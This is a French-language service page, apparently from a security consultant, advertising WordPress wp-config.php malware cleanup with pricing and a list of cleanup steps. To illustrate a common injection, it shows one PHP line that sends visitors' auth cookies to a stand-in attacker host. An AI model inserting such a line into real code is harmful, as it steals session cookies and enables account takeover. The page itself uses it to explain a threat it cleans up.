threatover Patrik Grobshäuser

PHARMA HACK · WORDPRESS · NETTOYÉ

wp-config.php malware cleanup.

wp-config.php s’exécute à chaque chargement de page WordPress, et c’est pour ça que les attaquants l’adorent. On retire l’injection, on tourne les clés et on vous dit à quoi l’attaquant avait accès. Forfait 279 $.

MÉCANISME

wp-config.php est le pire endroit pour qu’un attaquant plante du code.

wp-config.php se charge à chaque requête WordPress, avant même que WordPress ne puisse filtrer quoi que ce soit. Un attaquant qui modifie ce fichier peut exécuter du code à chaque page, capter chaque connexion, ou ajouter des admins cachés qui n’apparaissent pas dans le tableau de bord.

Dès que wp-config.php a été touché, vos salts, le mot de passe de la base et les clés d’authentification doivent être considérés comme compromis. On tourne tout dans le cadre du nettoyage, pas en option payante.

wp-config.php — schéma d’injection courant
01 02 // Legitimate wp-config starts with constants.
03 define('DB_NAME', 'wp_database');
04
05 // Injected — sends auth cookies to attacker on every request:
06 @file_get_contents("http://evil.example/c?d=" . $_COOKIE);

What I remove

Chaque ligne, chaque clé, chaque compte.

  • TRIAGE DES PLUGINS

    wp-config.php comparé ligne par ligne à une base saine. Chaque ligne non standard est examinée.

  • WP-CONFIG

    Code injecté retiré. Lignes include/require parasites pointant vers des fichiers inconnus — auditées et supprimées.

  • CLÉS

    AUTH_KEY, SECURE_AUTH_KEY, LOGGED_IN_KEY, NONCE_KEY et leurs salts tournés. Toutes les sessions invalidées.

  • BASE DE DONNÉES

    Utilisateurs admin cachés supprimés. Charges autoloaded de wp_options auditées pour toute persistance liée.

  • DURCISSEMENT

    Permissions de wp-config.php resserrées. Règles .htaccess et Nginx ajoutées pour interdire l’accès direct.

  • RAPPORT

    Rapport médico-légal en langage clair : à quoi l’attaquant avait accès, ce qui a été tourné, ce qu’il vous reste à faire.

Tarifs

Cleanup

$279

flat, one-time, per site

Manual cleanup, entry-vector identification, written forensic report.

Démarrer un nettoyage

Monitoring

$29 / mo

per site, cancel any time

Surveillance continue, durcissement, un nettoyage par an inclus.

Se protéger

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Voir tous les services →

E-mail [email protected] or use the contact form.